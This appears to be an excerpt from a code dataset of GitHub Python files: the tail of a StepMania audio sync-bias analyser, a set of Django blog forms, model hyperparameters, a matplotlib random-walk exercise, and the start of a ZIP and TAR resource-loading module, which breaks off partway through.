base_simfile.title\n simfile_subtitle = base_simfile.subtitletranslit or base_simfile.subtitle\n\n # Account for split audio\n audio_path = os.path.join(simfile_dir, find_music(simfile_dir, base_simfile.music))\n chart = None\n if chart_index is not None:\n chart = base_simfile.charts[chart_index]\n if chart.get('MUSIC') is not None:\n audio_path = os.path.join(simfile_dir, find_music(simfile_dir, chart.music))\n\n engine = TimingEngine(TimingData(base_simfile, chart))\n\n ###################################################################\n # Load audio using pydub\n audio_ext = os.path.splitext(audio_path)[1]\n audio = AudioSegment.from_file(audio_path, format=audio_ext[1:])\n audio_data = np.array(audio.get_array_of_samples())\n\n # Account for stereo audio and normalize\n # https://stackoverflow.com/questions/53633177/how-to-read-a-mp3-audio-file-into-a-numpy-array-save-a-numpy-array-to-mp3\n if audio.channels == 2:\n #audio_data = audio_data.reshape((-1, 2)).sum(1) * 0.5 # Reshape to stereo and average the two channels\n #audio_data = audio_data.reshape((-1, 2))[:, 0].flatten() # Pull mono only\n audio_data = audio_data.reshape((-1, 2)).max(1) # Reshape to stereo and average the two channels\n audio_data = audio_data / 2**15\n\n ###################################################################\n # Create spectrogram from audio\n # https://stackoverflow.com/questions/44787437/how-to-convert-a-wav-file-to-a-spectrogram-in-python3\n # https://stackoverflow.com/questions/47954034/plotting-spectrogram-in-audio-analysis\n fingerprint_ms = kwargs.get('fingerprint_ms', 50) # Moving fingerprint window (100ms is quite reasonable)\n window_ms = kwargs.get('window_ms', 10) # Window to calculate spectrogram over, ms\n step_ms = kwargs.get('step_ms', 0.2) # Overlap between windows (effectively step size), ms\n freq_emphasis = kwargs.get('freq_emphasis', 3000) # filt(f) = f * e^(-f / emphasis); use None to bypass\n eps = 1e-9 # Epsilon for logarithms\n\n nperseg = int(audio.frame_rate * window_ms * 1e-3) # number of samples per spectrogram segment\n nstep = int(audio.frame_rate * step_ms * 1e-3) # number of samples per spectrogram step\n noverlap = nperseg - nstep # number of overlap samples\n\n # Recalculate actual timestamps of spectrogram measurements\n actual_step = nstep / audio.frame_rate\n fingerprint_size = 2 * int(round(fingerprint_ms * 1e-3 / actual_step))\n\n frequencies = None\n times = None\n spectrogram = None\n window_size = nperseg / nstep\n spectrogram_offset = np.sqrt(0.5) * window_size # trying to figure out why this isn't half a window...smh\n # spectrogram_offset = 0.5 * window_size # maybe it should be??\n # print(spectrogram_offset * actual_step)\n n_time_taps = ((audio_data.shape[0] - nperseg) / nstep).__ceil__() # ceil(samples / step size)\n n_freq_taps = 1 + nperseg // 2 # Nyquist of the spectrogram segment (nperseg)\n\n # print(fingerprint_size)\n\n if full_spectrogram:\n # print(f'audio: {audio_data.shape}, nperseg: {nperseg}, noverlap: {noverlap}, actual_step: {actual_step}, n_spectral_taps: {n_time_taps}, n_freq_taps: {n_freq_taps}')\n frequencies, times, spectrogram = signal.spectrogram(\n audio_data[:],\n fs=audio.frame_rate,\n window='hann',\n nperseg=nperseg,\n noverlap=noverlap,\n detrend=False\n )\n # print(times[:10])\n # print(f'freqs, times, spec: {frequencies.shape}, {times.shape}, {spectrogram.shape}')\n splog = np.log2(spectrogram + eps) # Calculate in log domain\n\n if show_intermediate_plots:\n fig = plt.figure(figsize=(30, 6))\n plt.pcolormesh(times, frequencies * 1e-3, splog)\n plt.ylabel('Frequency [kHz]')\n plt.xlabel('Time [sec]')\n plt.title(f'Full spectrogram for {simfile_artist} - \"{simfile_title}\"')\n plt.show()\n\n ###################################################################\n # Use beat timing information to construct a \"fingerprint\"\n # of audio spectra around the time each beat takes place\n \n # Accumulator over beats, summed in the frequency domain\n acc = np.zeros((n_freq_taps, fingerprint_size))\n\n # Time-scale digest (frequencies flattened to single value,\n # each beat gets a fingerprint width)\n digest = np.zeros((0, fingerprint_size))\n\n # For each beat in the song that has a full\n # fingerprint's width of surrounding audio data:\n b = 0\n beat_indices = []\n t_last = -np.inf\n while True:\n t = engine.time_at(b)\n b += 1\n if (t < 0):\n # Too early\n continue\n if (t > audio.duration_seconds):\n # Too late\n break\n if (t - t_last < fingerprint_ms * 1e-3):\n # Too soon\n continue\n t_last = t\n\n # Because the spectrogram doesn't \"start\" until a full window is in view,\n # it has an inherent offset that amounts to half a window.\n # spectrogram_offset = window_ms * 0.5e-3\n # t_offset = (t - spectrogram_offset)\n\n t_s = int(round(t / actual_step - spectrogram_offset - fingerprint_size * 0.5))\n t_f = int(round(t / actual_step - spectrogram_offset + fingerprint_size * 0.5))\n if full_spectrogram:\n print(f'{t_s}~{t_f}: {times[t_s]:0.6f}~{times[t_f]:0.6f} -> {(times[t_f]+times[t_s])*0.5:0.6f} vs. {t:0.6f}')\n\n t_s = max(0, t_s)\n t_f = min(n_time_taps, t_f)\n if (t_f - t_s != fingerprint_size):\n # Not enough data at this beat tbh\n continue\n \n if full_spectrogram:\n sp_snippet = splog[:, t_s:t_f]\n else:\n t_sample_s = t_s * nstep\n t_sample_f = t_f * nstep + nperseg - 1 \n # print(f't_sample: {t_sample_s}:{t_sample_f}')\n \n frequencies, times, spectrogram = signal.spectrogram(\n audio_data[t_sample_s:t_sample_f],\n fs=audio.frame_rate,\n window='hann',\n nperseg=nperseg,\n noverlap=noverlap,\n detrend=False\n )\n # print(f'freqs, times, spec: {frequencies.shape}, {times.shape}, {spectrogram.shape}')\n sp_snippet = np.log2(spectrogram + eps) # Calculate in log domain\n \n frequency_weights = 1\n if freq_emphasis is not None:\n # filt(f) = f * e^(-f / emphasis); use None to bypass\n frequency_weights = np.tile(frequencies * np.exp(-frequencies / freq_emphasis), [fingerprint_size, 1]).T\n spfilt = sp_snippet * frequency_weights\n\n # Accumulate, and add to digest\n acc += spfilt[:n_freq_taps, :]\n digest = np.vstack([digest, np.sum(spfilt, axis=0)])\n beat_indices.append(b-1)\n \n\n ###################################################################\n # Apply a convolution to detect the downbeat attack\n\n if kernel_type == BiasKernel.LOUDEST:\n # Loudest point of attack\n time_edge_kernel = np.array([\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1],\n [1, 3, 10, 3, 1]\n ])\n else: # BiasKernel.RISING\n # Leading edge of attack\n time_edge_kernel = np.array([\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1],\n [1, 1, 0, -1, -1]\n ])\n edge_discard = time_edge_kernel.shape[1] // 2\n\n if kernel_target == KernelTarget.ACCUMULATOR:\n post_kernel = signal.convolve2d(acc, time_edge_kernel, mode='same', boundary='wrap')\n else: # kernel_target == KernelTarget.DIGEST\n post_kernel = signal.convolve2d(digest, time_edge_kernel, mode='same', boundary='wrap')\n \n # Flatten convolved fingerprint to a value that only depends on time\n post_kernel_flat = np.sum(post_kernel, axis=0)\n fingerprint_times = np.arange(-fingerprint_size // 2, fingerprint_size // 2) * actual_step\n fingerprint_times_ms = fingerprint_times * 1e3\n\n # Choose the highest response to the convolution as the downbeat attack\n post_kernel_clip = post_kernel_flat[edge_discard:-edge_discard]\n i_max = np.argmax(post_kernel_clip)\n sync_bias_ms = fingerprint_times_ms[i_max + edge_discard] + magic_offset_ms\n probable_bias = guess_paradigm(sync_bias_ms, short_paradigm=False, **kwargs)\n # print(f'Sync bias: {sync_bias:0.3f} ({probable_bias})')\n\n # Calculate a confidence statistic based on the presence of conflicting\n # high-level response distant from the chosen peak\n v_clip = np.interp(post_kernel_clip, (min(post_kernel_clip), max(post_kernel_clip)), (0, 1))\n t_clip = fingerprint_times_ms[edge_discard:-edge_discard]\n v_std = np.std(v_clip)\n v_mean = np.mean(v_clip)\n v_median = np.median(v_clip)\n v_20 = np.percentile(v_clip, 20)\n v_80 = np.percentile(v_clip, 80)\n v_max = v_clip[i_max]\n v_max_check = np.vstack((np.zeros_like(v_clip), (v_clip - v_median) / (v_max - v_median)))\n v_max_rivaling = np.max(v_max_check, axis=0)\n t_close_check = np.vstack((np.zeros_like(t_clip), abs(t_clip - t_clip[i_max]) - _NEARNESS_OFFSET)) / _NEARNESS_SCALAR\n t_close_enough = np.max(t_close_check, axis=0)\n max_influence = np.power(v_max_rivaling, 4) * np.power(t_close_enough, 1.5)\n total_max_influence = np.sum(max_influence) / np.size(max_influence)\n sync_confidence = min(1, (1 - np.power(total_max_influence, 0.2)) / _THEORETICAL_UPPER)\n conv_interquintile = v_80 - v_20\n conv_stdev = v_std\n\n full_title = get_full_title(base_simfile)\n\n plot_tag_vars = kwargs.get('tag_vars', {}) \n if len(plot_tag_vars) == 0:\n plot_tag = ''\n plot_tag_filename = ''\n else:\n plot_tag = ' (' + ', '.join(f'{k} = {v.format(kwargs.get(k))}' for k, v in plot_tag_vars.items()) + ')'\n plot_tag_filename = '-' + '-'.join(f'{k}_{v.format(kwargs.get(k))}' for k, v in plot_tag_vars.items())\n\n chart_tag = ''\n if chart is not None:\n fingerprint['steps_type'] = chart['STEPSTYPE']\n fingerprint['chart_slot'] = chart['DIFFICULTY']\n chart_tag = ' ' + slot_abbreviation(chart['STEPSTYPE'], chart['DIFFICULTY'], chart_index=chart_index, paradigm=guess_paradigm(sync_bias_ms, **kwargs))\n fingerprint['sample_rate'] = audio.frame_rate\n fingerprint['beat_digest'] = digest\n fingerprint['beat_indices'] = np.array(beat_indices)\n fingerprint['freq_domain'] = acc\n fingerprint['post_kernel'] = post_kernel\n fingerprint['convolution'] = post_kernel_flat\n fingerprint['frequencies'] = frequencies * 1e-3\n fingerprint['time_values'] = fingerprint_times_ms\n fingerprint['bias_result'] = sync_bias_ms\n fingerprint['confidence'] = sync_confidence\n fingerprint['conv_stdev'] = conv_stdev\n fingerprint['conv_quint'] = conv_interquintile\n fingerprint['plots_title'] = \\\n f'Sync fingerprint{plot_tag}\\n{simfile_artist} - \"{full_title}\"{chart_tag}' + \\\n f'\\n{sync_bias_ms:+0.1f} ms bias ({probable_bias}), {round(sync_confidence*100):d}% conf'\n \n sanitized_title = slugify(full_title + chart_tag, allow_unicode=False)\n target_axes = []\n target_figs = []\n for i in range(3):\n fig = plt.figure(figsize=(6, 6))\n target_figs.append(fig)\n target_axes.append(fig.add_subplot(1, 1, 1))\n \n plot_fingerprint(fingerprint, target_axes, **kwargs)\n\n # DEBUG: convolution output for confidence research\n with open(os.path.join(report_path, f'convolution-{sanitized_title}.csv'), 'w', newline='', encoding='ascii') as conv_fp:\n writer = csv.writer(conv_fp)\n for t, v in zip(fingerprint_times_ms, post_kernel_flat):\n writer.writerow([f'{t:0.6f}', f'{v:0.6f}'])\n\n for i, v in enumerate(['freqdomain', 'beatdigest', 'postkernel']):\n fig = target_figs[i]\n if show_intermediate_plots:\n fig.show()\n if save_plots:\n fig.savefig(os.path.join(report_path, f'bias-{v}-{sanitized_title}{plot_tag_filename}.png'))\n plt.close(fig)\n\n plot_hook_gui = kwargs.get('plot_hook_gui')\n if plot_hook_gui is not None:\n plot_fingerprint(fingerprint, plot_hook_gui.figure.get_axes(), hide_yticks=True, **kwargs)\n plot_hook_gui.canvas.draw()\n\n if show_intermediate_plots:\n # Quick and dirty plot of convolution response\n plt.plot(fingerprint_times_ms, post_kernel_flat)\n plt.show()\n\n # Done!\n return fingerprint\n\n\ndef check_paths(params):\n # Verify existence of root path\n root_path = params['root_path']\n if not os.path.isdir(root_path):\n raise Exception(f'Root directory doesn\\'t exist: {root_path}')\n else:\n print(f\"Root directory exists: {root_path}\")\n\n # Verify existence of root path\n report_path = params['report_path']\n if report_path is None:\n report_path = os.path.join(root_path, '__bias-check')\n params['report_path'] = report_path\n if not os.path.isdir(report_path):\n try:\n os.makedirs(report_path)\n print(f\"Report directory created: {report_path}\")\n except Exception as e:\n raise Exception(f'Report directory can\\'t be created: {report_path}')\n else:\n print(f\"Report directory exists: {report_path}\")\n\n\ndef setup_logging(report_path: str):\n # Set up logging\n log_stamp = timestamp()\n log_path = os.path.join(report_path, f'nine-or-null-{log_stamp}.log')\n log_fmt = logging.Formatter(\n '[%(asctime)s.%(msecs)03d] %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n logging.basicConfig(\n filename=log_path,\n encoding='utf-8',\n level=logging.INFO\n )\n logging.getLogger().addHandler(logging.StreamHandler())\n for handler in logging.getLogger().handlers:\n handler.setFormatter(log_fmt)\n\n csv_path = os.path.join(report_path, f'nine-or-null-{log_stamp}.csv')\n return {\n 'log_stamp': log_stamp,\n 'log_path': log_path,\n 'csv_path': csv_path\n }\n\n\ndef batch_process(root_path=None, **kwargs):\n gui_hook = kwargs.get('gui_hook')\n csv_hook = kwargs.get('csv_hook')\n\n if root_path is None:\n root_path = os.getcwd()\n simfile_dirs = []\n for r, d, f in os.walk(root_path):\n for fn in f:\n if os.path.splitext(fn)[1] in ['.ssc', '.sm']:\n simfile_dirs.append(r)\n \n simfile_dirs = sorted(list(set(simfile_dirs)))\n fingerprints = {}\n logging.info(f'Found {len(simfile_dirs)} simfiles in {root_path}')\n for d in simfile_dirs:\n logging.info(f'\\t{os.path.relpath(d, root_path)}')\n\n time_start = dt.utcnow()\n for i, p in enumerate(simfile_dirs):\n # Open simfile\n test_simfile_path = None\n for f in os.listdir(p):\n if os.path.splitext(f)[1] in ['.ssc', '.sm']:\n if (test_simfile_path is None) or (os.path.splitext(test_simfile_path)[1] == '.sm'):\n test_simfile_path = os.path.join(p, f)\n if test_simfile_path is None:\n # How did this happen!\n continue\n\n try:\n time_elapsed = dt.utcnow() - time_start\n time_elapsed_str = timedelta_as_hhmmss(time_elapsed) + ' elapsed'\n if i > 0:\n time_expected = time_elapsed * (len(simfile_dirs) / i)\n time_elapsed_str += ', ' + timedelta_as_hhmmss(time_expected) + ' expected'\n logging.info(f'({i+1:d}/{len(simfile_dirs):d}: {time_elapsed_str})')\n if gui_hook is not None:\n gui_hook.SetStatusText(f'({i+1:d}/{len(simfile_dirs):d}: {time_elapsed_str}) Checking sync bias on {os.path.relpath(p, root_path)}...')\n gui_hook.allow_to_update()\n\n base_simfile = simfile.open(test_simfile_path, strict=False)\n # Account for split timing.\n charts_within = [None]\n for chart_index, chart in enumerate(base_simfile.charts):\n if any(k in chart for k in ['OFFSET', 'BPMS', 'STOPS', 'DELAYS', 'WARPS']):\n logging.info(f'{base_simfile.title}: {chart_index} ({chart.difficulty}) has split timing')\n charts_within.append(chart_index)\n\n for split_chart in charts_within:\n fp = check_sync_bias(p, base_simfile, chart_index=split_chart, save_plots=True, show_intermediate_plots=False, **kwargs)\n sync_bias_ms = fp['bias_result']\n sync_confidence = fp['confidence']\n conv_quint = 'conv_quint' in fp and f\"{fp['conv_quint']:0.6f}\" or '----'\n conv_stdev = 'conv_stdev' in fp and f\"{fp['conv_stdev']:0.6f}\" or '----'\n \n chart_abbr = '*'\n if split_chart is not None:\n chart = base_simfile.charts[split_chart]\n chart_abbr = slot_abbreviation(chart['STEPSTYPE'], chart['DIFFICULTY'], chart_index=split_chart, paradigm=guess_paradigm(sync_bias_ms, **kwargs))\n \n fp_lookup = os.path.join(p, chart_abbr)\n fingerprints[fp_lookup] = fp\n\n logging.info(f'\\t{fp_lookup}')\n logging.info(f'\\tderived sync bias = {sync_bias_ms:+0.1f} ms ({guess_paradigm(sync_bias_ms, short_paradigm=False, **kwargs)})')\n logging.info(f'\\tbias confidence = {round(sync_confidence*100):3d}% (interquintile spread = {conv_quint}, stdev = {conv_stdev})')\n if gui_hook is not None:\n row_index = len(fingerprints)-1\n gui_hook.grid_results.InsertRows(row_index, 1)\n gui_hook.grid_results.SetCellValue(row_index, 0, os.path.relpath(p, root_path))\n gui_hook.grid_results.SetCellValue(row_index, 1, chart_abbr)\n gui_hook.grid_results.SetCellValue(row_index, 2, f'{sync_bias_ms:+0.1f}')\n gui_hook.grid_results.SetCellValue(row_index, 3, f'{round(sync_confidence*100):3d}%')\n gui_hook.grid_results.SetCellValue(row_index, 4, guess_paradigm(sync_bias_ms, **kwargs))\n gui_hook.grid_results.MakeCellVisible(row_index, 4)\n for j in range(4):\n gui_hook.grid_results.SetReadOnly(row_index, j)\n gui_hook.grid_results.ForceRefresh()\n gui_hook.allow_to_update()\n if csv_hook is not None:\n row = {\n 'path': os.path.relpath(p, root_path),\n 'slot': chart_abbr,\n 'bias': f'{sync_bias_ms:0.3f}',\n 'conf': f'{sync_confidence:0.4f}',\n 'interquintile': f\"{fp.get('conv_quint', None)}\",\n 'stdev': f\"{fp.get('conv_stdev', None)}\",\n 'paradigm': guess_paradigm(sync_bias_ms, **kwargs),\n 'timestamp': timestamp(),\n 'sample_rate': fp.get('sample_rate', None)\n }\n for simfile_attr in ['title', 'titletranslit', 'subtitle', 'subtitletranslit', 'artist', 'artisttranslit', 'credit']:\n row[simfile_attr] = base_simfile.get(simfile_attr.upper(), '')\n for param in ['fingerprint_ms', 'window_ms', 'step_ms', 'kernel_type', 'kernel_target']:\n row[param] = kwargs.get(param, None)\n csv_hook.writerow(row)\n except Exception as e:\n logging.exception(e)\n\n return fingerprints\n \n\ndef batch_adjust(fingerprints, target_bias, **params):\n if target_bias == '+9ms':\n source_bias = 'null'\n bias_shift = +0.009\n elif target_bias == 'null':\n source_bias = '+9ms'\n bias_shift = -0.009\n else:\n raise Exception(f'What paradigm does \"{target_bias}\" represent?')\n\n logging.info(f'Converting charts with +9ms (In The Groove) bias to null (StepMania)...')\n affect_rows = params.get('affect_rows')\n for i, k in enumerate(fingerprints):\n if affect_rows is not None and i not in affect_rows:\n continue\n current_paradigm = fingerprints[k].get('bias_adjust', guess_paradigm(fingerprints[k]['bias_result'], **params))\n current_confidence = fingerprints[k].get('confidence', 100)\n if current_paradigm == source_bias and current_confidence >= params.get('confidence_limit', 0):\n logging.info(f'\\t{k}')\n # Open simfile\n p, abbr = os.path.split(k)\n test_simfile_path = None\n for f in os.listdir(p):\n if os.path.splitext(f)[1] in ['.ssc', '.sm']:\n if (test_simfile_path is None) or (os.path.splitext(test_simfile_path)[1] == '.sm'):\n test_simfile_path = os.path.join(p, f)\n if test_simfile_path is None:\n # How did this happen!\n logging.info(f'What? Couldn\\'t find a simfile at \"{p}\"')\n continue\n\n with simfile.mutate(\n test_simfile_path,\n backup_filename=test_simfile_path + \".oldsync\",\n strict=False\n ) as sm:\n try:\n if abbr == '*':\n new_offset = float(sm.offset) + bias_shift\n logging.info(f'\\t{float(sm.offset):6.3f} -> {new_offset:6.3f}: {k}')\n sm.offset = f'{new_offset:0.3f}'\n else:\n steps_type, chart_slot, chart_index = slot_expansion(abbr)\n if chart_index is None:\n chart_index = [i for i, c in enumerate(sm.charts) if c['STEPSTYPE'] == steps_type and c['DIFFICULTY'] == chart_slot][0]\n prev_offset = float(sm.charts[chart_index].get('OFFSET', sm.offset))\n new_offset = prev_offset + bias_shift\n logging.info(f'\\t{prev_offset:6.3f} -> {new_offset:6.3f}: {k}')\n sm.charts[chart_index]['OFFSET'] = f'{new_offset:0.3f}'\n fingerprints[k]['bias_result'] += bias_shift * 1e3\n fingerprints[k]['bias_adjust'] = target_bias\n \n gui_hook = params.get('gui_hook')\n if gui_hook is not None:\n font_cell = gui_hook.grid_results.GetCellFont(i, 0)\n gui_hook.grid_results.SetCellValue(i, 2, f\"{fingerprints[k]['bias_result']:+0.1f}\")\n gui_hook.grid_results.SetCellValue(i, 4, target_bias)\n for j in range(gui_hook.grid_results.GetNumberCols()):\n gui_hook.grid_results.SetCellFont(i, j, font_cell.MakeBold())\n\n\n except Exception as e:\n raise Exception(f'Something happened while adjusting bias for {test_simfile_path}') from e\n \n logging.info(f'Converting charts with +9ms (In The Groove) bias to null (StepMania)...Done!')\n \n","repo_name":"telperion/nine-or-null","sub_path":"nine-or-null/nine_or_null/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":40102,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"72324546113","text":"from django import forms\nfrom blog.models import Post,MyComment\nfrom ckeditor.fields import RichTextField\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass PostForm(forms.ModelForm):\n\n class Meta():\n model = Post\n fields = ('author','title','text','image')\n \n labels = {\n 'text': _(''),\n 'image': _('Post Image')\n }\n widgets = {\n 'author':forms.Select(attrs={\"class\":\"browser-defaul\"}),\n 'title':forms.TextInput(attrs={'class':'form-control mw-90'}),\n \n }\nclass MyCommentForm(forms.ModelForm):\n\n class Meta():\n model = MyComment\n fields = ('author','text')\n\n widgets = {\n 'author':forms.TextInput(attrs={'class':''}),\n 'text':forms.Textarea(attrs={'class':'form-control mw-10'})\n }\n","repo_name":"deezitheviper/custom-DjangoBlog","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11546657056","text":"sequence_length = 300\ninput_size = 378\nhidden_size = 64\nnum_layers = 2\nnum_classes = 2 # Depressed or not depressed\nbatch_size = 50\nnum_epochs = 10\nlearning_rate = 0.001\nrec_dropout = 0.05\nfeature_len = 378","repo_name":"HimangiM/Depression_Detection","sub_path":"codes/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"43832402963","text":"import os\nimport sys\nfrom random import choice\nrw_lib_dir = os.path.dirname(os.path.dirname(__file__))\nsys.path.append(rw_lib_dir)\n\nimport matplotlib.pyplot as plt\n\nfrom random_walk import RandomWalk\n\n\nclass RandomWalk2(RandomWalk):\n def fill_walk(self):\n while len(self.x_values) < self.num_points:\n x_choice = choice([-1, 1, 0.5, -0.5])\n x_distance = choice([0, 1, 2, 3, 4, 5, 6, 7, 8])\n x_step = x_choice * x_distance\n\n y_choice = choice([-1, 1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_step = y_choice * y_distance\n\n if x_step == 0 and y_step == 0:\n continue\n\n x = self.x_values[-1] + x_step\n y = self.y_values[-1] + y_step\n\n self.x_values.append(x)\n self.y_values.append(y)\n\n\nwhile True:\n\n rw = RandomWalk2(50_000)\n rw.fill_walk()\n\n plt.style.use('classic')\n fig, ax = plt.subplots(figsize=(19, 10))\n point_numbers = range(rw.num_points)\n ax.scatter(rw.x_values, rw.y_values, c=point_numbers, cmap=plt.cm.Greens,\n edgecolors='None', s=2)\n # start point and the end point\n ax.scatter(0, 0, c='purple', edgecolors='None', s=100)\n ax.scatter(rw.x_values[-1], rw.y_values[-1], c='red',\n edgecolors='None', s=100)\n # x-axis and y-axis set the same step\n ax.set_aspect('equal')\n\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n): \")\n if keep_running == 'n':\n break\n","repo_name":"amazing-2020/pdf","sub_path":"Python/PythonCrashCourse/project2/chapter15/having a try/exercise15-4.py","file_name":"exercise15-4.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24350287785","text":"import sys\nimport os\nimport re\nimport zipfile\nimport tarfile\nimport io\n\n__all__ = [\"open_zipfile\", \"open_tarfile\", \"open_url\", \"Resources\"]\n\n# Python 3.x workarounds for the changed urllib modules.\nif sys.version_info[0] >= 3:\n import urllib.parse as urlparse\n import urllib.request as urllib2\nelse:\n import urlparse\n import urllib2\n\n\ndef _validate_path(path, what, write=False):\n fullpath = os.path.abspath(path)\n fname = os.path.basename(path)\n if write:\n parent = os.path.abspath(os.path.join(fullpath, os.pardir))\n if not os.path.isdir(parent):\n e = \"The given parent directory '{0}' does not exist\"\n raise IOError(e.format(parent))\n else:\n if not os.path.exists(fullpath):\n e = \"Could not find {0} at the given path: {1}\"\n raise IOError(e.format(what, fullpath))\n return (fullpath, fname)\n\n\ndef open_zipfile(archive, filename, directory=None):\n \"\"\"Retrieves a given file from a ZIP archive.\n\n Args:\n archive (:obj:`~zipfile.ZipFile`, str): The ZipFile object or path to\n the ZIP archive containing the desired file.\n filename (str): The name of the file to retrieve from the archive.\n directory (str, optional): The path to the directory within the archive\n containing the file to retrieve. Defaults to the root level of the\n archive.\n\n Returns:\n :obj:`~io.BytesIO`: A Python bytestream object containing the requested\n file.\n\n Raises:\n KeyError: If the given file could not be found within the archive.\n TypeError: If the archive is not a valid ZIP archive.\n\n \"\"\"\n data = None\n opened = False\n\n if not isinstance(archive, zipfile.ZipFile):\n if not zipfile.is_zipfile(archive):\n raise TypeError(\"passed file does not seem to be a ZIP archive\")\n else:\n archive = zipfile.ZipFile(archive, 'r')\n opened = True\n\n apath = filename\n if directory:\n apath = \"%s/%s\" % (directory, filename)\n\n try:\n dmpdata = archive.open(apath)\n data = io.BytesIO(dmpdata.read())\n finally:\n if opened:\n archive.close()\n return data\n\n\ndef open_tarfile(archive, filename, directory=None, ftype=None):\n \"\"\"Retrieves a given file from a TAR archive.\n\n If the TAR archive uses ``.tar.gz`` or ``.tar.bz2`` compression and the\n file name does not contain either of these identifiers, the compression\n type must be manually specified.\n\n Args:\n archive (:obj:`~tarfile.TarFile`, str): The TarFile object or path to\n the TAR archive containing the desired file.\n filename (str): The name of the file to retrieve from the archive.\n directory (str, optional): The path to the directory within the archive\n containing the file to retrieve. Defaults to the root level of the\n archive.\n ftype (str, optional): The compression type (if any) used for the TAR\n file, can be either 'gz', 'bz2', or None (no compression). If not\n specified, will default to assuming no compression.\n\n Returns:\n :obj:`~io.BytesIO`: A Python bytestream object containing the requested\n file.\n\n Raises:\n KeyError: If the given file could not be found within the archive.\n TypeError: If the archive is not a supported TAR archive.\n\n \"\"\"\n data = None\n opened = False\n\n if not isinstance(archive, tarfile.TarFile):\n if not tarfile.is_tarfile(archive):\n raise TypeError(\"passed file does not seem to be a TAR archive\")\n else:\n file_ext = archive.split('.')[-1]\n if not ftype and file_ext in ('gz', 'bz2'):\n ftype = file_ext\n if ftype and ftype not in ('gz', 'bz2'):\n e = \"invalid TAR compression type '{0}' (must be 'gz' or 'bz2')\"\n raise TypeError(e.format(ftype))\n mode = 'r:{0}'.format(ftype) if ftype else 'r'\n archive = tarfile.open(archive, mode)\n opened = True\n\n apath = filename\n if directory:\n apath = \"%s/%s\" % (directory, filename)\n\n try:\n dmpdata = archive.extractfile(apath)\n data = io.BytesIO(dmpdata.read())\n finally:\n if opened:\n archive.close()\n return data\n\n\ndef open_url(filename, basepath=None):\n # Opens and reads a certain file from a web or remote location.\n # Deprecated because its argument names are confusing and because\n # users are probably better off using urllib directly.\n url = filename\n if basepath:\n url = urlparse.urljoin(basepath, filename)\n return urllib2.urlopen(url)\n\n\nclass Resources(object):\n \"\"\"A container class for managing application resource files.\n \n This class eases access to resources by allowing access using relative\n paths, scanning archives to locate files, and more.\n\n Args:\n path (str, optional): The path of a resource directory with which to\n initialze the container. Defaults to ``None``.\n subdir (str, optional): Deprecated, do not use.\n excludepattern (str, optional): A regular expression indicating\n which directories (if any) to ignore if initializing the\n container with a resource path. Defaults to ``None``.\n\n \"\"\"\n def __init__(self, path=None, subdir=None, excludepattern=None):\n self.files = {}\n if path:\n self.scan(path, subdir, excludepattern)\n\n def _scanzip(self, filename):\n \"\"\"Scans the passed ZIP archive and indexes all the files\n contained by it.\n \"\"\"\n if not zipfile.is_zipfile(filename):\n raise TypeError(\"file '%s' is not a valid ZIP archive\" % filename)\n archname = os.path.abspath(filename)\n zipf = zipfile.ZipFile(filename, 'r')\n for path in zipf.namelist():\n fname = os.path.split(path)[1]\n if fname:\n self.files[fname] = (archname, 'zip', path)\n zipf.close()\n\n def _scantar(self, filename, ftype=None):\n \"\"\"Scans the passed TAR archive and indexes all the files\n contained by it.\n \"\"\"\n if not tarfile.is_tarfile(filename):\n raise TypeError(\"file '%s' is not a valid TAR archive\" % filename)\n file_ext = filename.split('.')[-1]\n if not ftype and file_ext in ('gz', 'bz2'):\n ftype = file_ext\n if ftype and ftype not in ('gz', 'bz2'):\n e = \"invalid TAR compression type '{0}' (must be 'gz' or 'bz2')\"\n raise TypeError(e.format(ftype))\n mode = 'r:{0}'.format(ftype) if ftype else 'r'\n archname = os.path.abspath(filename)\n archtype = 'tar'\n if ftype:\n archtype = 'tar%s' % ftype\n tar = tarfile.open(filename, mode)\n for path in tar.getnames():\n fname = os.path.split(path)[1]\n self.files[fname] = (archname, archtype, path)\n tar.close()\n\n def add(self, filename):\n \"\"\"Adds a file to the Resources container.\n\n If the given file is a supported archive, its contents will be scanned\n and added to the container.\n\n Args:\n filename (str): The filepath of the resource to add to the\n container.\n\n Raises:\n ValueError: If the file does not exist at the provided path.\n\n \"\"\"\n if not os.path.exists(filename):\n raise ValueError(\"invalid file path\")\n if zipfile.is_zipfile(filename):\n self.add_archive(filename)\n elif tarfile.is_tarfile(filename):\n self.add_archive(filename, 'tar')\n else:\n self.add_file(filename)\n\n def add_file(self, filename):\n \"\"\"Adds a file without scanning to the Resources container.\n\n Unlike :meth:`add`, this method will not attempt to add the contents\n of any provided archives to the container.\n\n Args:\n filename (str): The filepath of the resource to add to the\n container.\n\n Raises:\n ValueError: If the file does not exist at the provided path.\n\n \"\"\"\n if not os.path.exists(filename):\n raise ValueError(\"invalid file path\")\n abspath = os.path.abspath(filename)\n fname = os.path.split(abspath)[1]\n if not fname:\n raise ValueError(\"invalid file path\")\n self.files[fname] = (None, None, abspath)\n\n def add_archive(self, filename, typehint='zip'):\n \"\"\"Adds a ``.zip`` or ``.tar`` archive to the container.\n\n This will scan the passed archive and add its contents to the\n list of available resources. Currently ``.zip``, ``.tar``,\n ``.tar.bz2``, and ``.tar.gz`` formats are supported.\n\n Args:\n filename (str): The filepath of the archive to scan and add to the\n container.\n typehint (str, optional): The format of the archive to add to the\n container, required if using a custom file extension. Must be\n one of ``zip``, ``tar``, ``tarbz2``, or 